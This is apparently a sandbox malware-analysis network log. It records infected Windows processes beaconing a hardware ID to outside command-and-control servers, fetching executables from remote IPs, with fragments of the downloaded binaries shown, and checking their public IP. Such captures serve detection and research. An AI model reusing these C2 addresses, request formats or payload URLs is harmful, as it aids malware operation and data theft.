Dec 10, 2024 11:11:36.007414103 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49920	185.215.113.206	80	408	C:\Users\user\AppData\Local\Temp\1013677001\9e4b3ff3c2.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:36.994049072 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 11:11:38.417594910 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 11:11:38.451944113 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 35 46 31 34 42 35 41 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="hwid"AC5F14B5AD762778904926------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="build"stok------CGDGHCBGDHJJKECAECBA--
Dec 10, 2024 11:11:38.903939009 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:38 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49933	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:40.707539082 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 36 37 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013678001&unit=246122658369
Dec 10, 2024 11:11:42.054414034 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49937	185.215.113.16	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:42.178332090 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 10, 2024 11:11:43.519246101 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:43 GMT Content-Type: application/octet-stream Content-Length: 2845184 Last-Modified: Tue, 10 Dec 2024 09:47:58 GMT Connection: keep-alive ETag: "67580e4e-2b6a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2c 00 00 04 00 00 54 fa 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ ,T+`Ui` @ @.rsrc`2@.idata 8@fdostlpk ++:@xuupeoyq +B+@.taggant@+"H+@
Dec 10, 2024 11:11:43.519301891 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519320965 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519335985 CET	372	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519488096 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519562006 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519572973 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519584894 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:43.519678116 CET	1236	IN	Data Raw: 95 a2 fe 2a e2 87 7f c9 4a a4 5b 24 8c 08 66 88 4a e7 30 16 3d 92 e6 ae b2 fc 97 18 53 90 e5 56 cc 6b cd 93 22 b3 2c c3 d6 12 00 6d 5e a2 12 f3 3f aa 0d 45 d6 26 6c 4c 5c b2 e2 09 53 a3 31 f8 52 42 ac ca d5 76 e7 ae 54 16 fa b7 1a 7b df 9f db e9 Data Ascii: *J[$fJ0=SVk",m^?E&lL\S1RBvT{T(nS,M"~{A~7U%?}MDhMPCU`CpBRMv9mn/\|MFSD_8m~,Z4j.nVG^PB[
Dec 10, 2024 11:11:43.519690990 CET	1236	IN	Data Raw: b8 79 37 28 f8 87 2b 06 7a 42 51 27 a2 43 28 f6 9b 76 3f 25 9f e0 5d 5d aa fd 4e cb 9e fa 3b c5 91 a8 48 39 c8 00 69 f4 9f b9 d5 a6 0e d9 8a f7 95 b8 20 03 e8 02 f1 5f 98 f2 2c d4 28 89 58 0a f3 54 30 9c ae 51 4f b5 2b 39 8f 09 96 4f 1d 5b 9d 53 Data Ascii: y7(+zBQ'C(v?%]]N;H9i _,(XT0QO+9O[S,D)-RFMaxSQVz99/?i e0hXh0`8_MSeG}",ltmy?nv#s3Qz'8=1Ml#0,
Dec 10, 2024 11:11:43.638885021 CET	776	IN	Data Raw: 98 16 29 9f 5a c8 a1 2c ff 35 16 7c 94 57 2d 90 44 4a b4 22 14 c1 91 18 97 50 b1 ef 2b 95 2b 04 a7 4f 2f 97 41 a7 4c 05 f2 87 e6 2c 8b 4d 0a e2 c7 26 12 e9 d8 72 3c b9 af 88 01 39 68 a8 dd 71 40 5e a1 2a 4a a9 4d 21 ce 29 37 32 91 87 31 47 44 51 Data Ascii: )Z,5\|W-DJ"P++O/AL,M&r<9hq@^JM!)721GDQM\^;~;bsLBWiVv~;QY!ZGe?d{\s@/$KEF,K_Q3.-U]UIwO-V9(InSRA/Mq8J%Zeh6^IY5&vV>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49951	104.16.185.241	80	6728	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:45.812414885 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 10, 2024 11:11:46.909908056 CET	535	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:46 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=gTJMzednnu5jYf7ZQxtUFIPCyLqEuk_HllWL7.OjgA4-1733825506-1.0.1.1-AkZAD48QkTKUWwr82GRx85gIWkGLAMKNugqgqagDv1j6wrCeusVubRT6CWvdOA4y3Z5n5.7zOEVQW0VfLQ0RMg; path=/; expires=Tue, 10-Dec-24 10:41:46 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8efc73e92e7ac402-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 0a Data Ascii: 8.46.123.175
Dec 10, 2024 11:11:53.995966911 CET	39	OUT	GET / HTTP/1.1 Host: icanhazip.com
Dec 10, 2024 11:11:54.316195011 CET	535	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:54 GMT Content-Type: text/plain Content-Length: 13 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=zS3dtxbz8Qb9AHlHUWrOCm9FuAxT3qzJsJsDaun3b_g-1733825514-1.0.1.1-5FFHdiqxSz_WdRGEXjXtnqY5ACrvYWUBjpjnX39FTiJBrLlq6dRDzZGLnHRZ_CjkD0vkvIMqP2gM6vE3sHqxKA; path=/; expires=Tue, 10-Dec-24 10:41:54 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8efc741778cfc402-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 0a Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49962	208.95.112.1	80	6728	C:\Users\user\AppData\Local\Temp\1013675001\H3tyh96.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:48.423048019 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 10, 2024 11:11:49.498140097 CET	175	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:48 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.5	49984	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:50.434051037 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 11:11:51.749624014 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 11:11:51.752769947 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 35 46 31 34 42 35 41 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 4a 4b 46 48 43 41 45 47 44 48 49 44 47 44 48 44 41 2d 2d 0d 0a Data Ascii: ------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="hwid"AC5F14B5AD762778904926------BAKJKFHCAEGDHIDGDHDAContent-Disposition: form-data; name="build"stok------BAKJKFHCAEGDHIDGDHDA--
Dec 10, 2024 11:11:52.205383062 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:11:51 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49988	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:51.499150038 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 36 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013679001&unit=246122658369
Dec 10, 2024 11:11:52.915332079 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49996	31.41.244.11	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:11:53.040220976 CET	62	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 10, 2024 11:11:54.365678072 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:11:54 GMT Content-Type: application/octet-stream Content-Length: 1966080 Last-Modified: Tue, 10 Dec 2024 08:03:38 GMT Connection: keep-alive ETag: "6757f5da-1e0000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 b0 86 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 86 00 00 04 00 00 86 5b 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELd@[ZBn@h! @T@.rsrch!@d@.idata B@ ) B@wdmfkhwdk@dxdebgre@.taggant0"@
Dec 10, 2024 11:11:54.365787983 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:54.365798950 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:54.365809917 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 10, 2024 11:11:54.365870953 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: c!Y2iA?lW]":
Dec 10, 2024 11:11:54.365884066 CET	448	IN	Data Raw: 7f 40 7b ea 4b 80 d7 38 2e 63 fc db 40 37 84 30 d2 ba 4e 85 0d 83 6b fd 28 35 c9 34 d8 e3 f2 8a 01 fe dd 43 59 89 1e f6 a2 5f 94 75 6d 57 d4 32 55 83 91 ec 14 1b 25 50 95 99 62 bc 2d 44 cf 34 0a 96 9b b5 94 20 b4 0f 02 42 45 f4 49 6c cb 42 00 44 Data Ascii: @{K8.c@70Nk(54CY_umW2U%Pb-D4 BEIlBD_5Wu%u-~cy5^O:3U6=&;^hy`q[z$!L3Ph]qmU!>%m/^YZFk6{SwNf
Dec 10, 2024 11:11:54.366389990 CET	1236	IN	Data Raw: 28 d2 39 20 39 3a 88 0d 2b 62 cc 94 10 06 f2 82 76 7a 86 54 ad d0 d5 97 1d 49 69 0a 26 9c 22 6e 2e 91 36 aa 28 85 9d 63 be a7 35 7e e6 71 08 9c ed 84 c6 84 be 0e d3 98 f2 81 ee a3 ed fe 84 f3 0c 71 98 70 b2 38 7e f3 79 9b 10 92 bd 85 cc e7 fa 95 Data Ascii: (9 9:+bvzTIi&"n.6(c5~qqp8~y5SgyIYYT]!aKebV^htE%qacF\07i\-p=C_5H5Bs+<k5rw5wflR"Ij- +#/2Pf"_y
Dec 10, 2024 11:11:54.366466999 CET	1236	IN	Data Raw: db c2 29 95 05 f2 37 a4 01 94 35 a0 ff c9 c0 f4 3a e8 34 28 f5 16 bb f4 85 62 25 13 a8 1e 25 2c 04 32 20 7c 19 b9 44 0d 8a 75 89 60 6f 72 93 0e 52 d9 58 19 fa 2f 4d 86 c1 53 13 57 34 a2 a6 99 53 a1 1a 65 43 fe 9d aa 66 97 9c 65 c1 52 8e 62 fd 1f Data Ascii: )75:4(b%%,2 \|Du`orRX/MSW4SeCfeRbmXvE}nj\|~SU}L]'G["dGM=d(^gr 2a$4D}[H@Kw\|/5SuCSsKMZt.j#4&< .
Dec 10, 2024 11:11:54.366477966 CET	1236	IN	Data Raw: 46 9d 56 10 17 b3 aa 0d ae e9 1d 3c 66 ba 39 fe df 71 78 17 08 a0 76 48 0a 95 59 62 63 49 20 1c 6d 86 76 cf e5 5e 1d 80 33 65 77 bb f1 85 2d 56 ba 0b 00 f3 1b bf c9 3c 43 58 2d bb c7 e1 c7 18 db a1 db e4 0c c4 35 ce 99 d9 03 8f 99 92 99 95 26 01 Data Ascii: FV<f9qxvHYbcI mv^3ew-V<CX-5&tiar4_ca[v6N3"7<\UQ=Usc,ItJtu\|_d3]oMpv.th&Fh\Nbw3vGnjw
Dec 10, 2024 11:11:54.366519928 CET	1236	IN	Data Raw: f2 79 6c c8 d2 3b 83 f0 b5 d4 95 6a 35 5f e8 b6 1e 25 2a be 2b 67 9d ac 25 05 2d 90 2a a8 a1 a3 eb 92 1d 2d 74 4f eb 31 29 23 78 88 b3 32 ff e2 34 b8 dd 13 48 46 98 e8 c8 7e 7c 70 d9 90 05 b7 c9 7a 59 01 9d 6a 11 98 d2 52 6d a9 2d 94 35 ac f5 31 Data Ascii: yl;j5_%+g%--tO1)#x24HF~\|pzYjRm-51\.K~>v$R?!"XaSZ 'Zr(.AOYses!7%F0\`ZN/$wmyU(soyd@m4jPL~Cu
Dec 10, 2024 11:11:54.485512972 CET	1236	IN	Data Raw: 09 e7 97 02 b7 6e db 55 18 6a c0 a8 49 65 47 c2 15 23 bc 1c d1 bb 60 c9 5b 5a a8 fe 69 74 32 c7 03 ae 91 3e e5 79 dd 10 31 64 32 d0 98 6e 96 a1 e4 70 db fa db 4b 54 5d 51 82 6a 5c eb c4 bf 3c 26 57 e8 84 5e aa 62 91 8a 24 ec e6 9a 1a 8f 5d d6 ba Data Ascii: nUjIeG#`[Zit2>y1d2npKT]Qj\<&W^b$]*)i@F\|,#m-Hz6a 2-0^wnjgQq'jx!O2XiW:+G"dA)r([3rn(kr[I4zM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50020	185.215.113.43	80	1708	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:12:00.391350985 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 36 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013680001&unit=246122658369
Dec 10, 2024 11:12:01.726227999 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 10 Dec 2024 10:12:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	50096	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 11:12:30.346025944 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 11:12:31.668540955 CET	203	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:12:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 11:12:31.803680897 CET	413	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFC Host: 185.215.113.206 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 35 46 31 34 42 35 41 44 37 36 32 37 37 38 39 30 34 39 32 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="hwid"AC5F14B5AD762778904926------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="build"stok------EGDGIIJJECFIDHJJKKFC--
Dec 10, 2024 11:12:32.253344059 CET	210	IN	HTTP/1.1 200 OK Date: Tue, 10 Dec 2024 10:12:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49867	104.21.32.1	443	1264	C:\Users\user\AppData\Local\Temp\1013676001\75f24a4b40.exe

Timestamp	Bytes transferred	Direction	Data
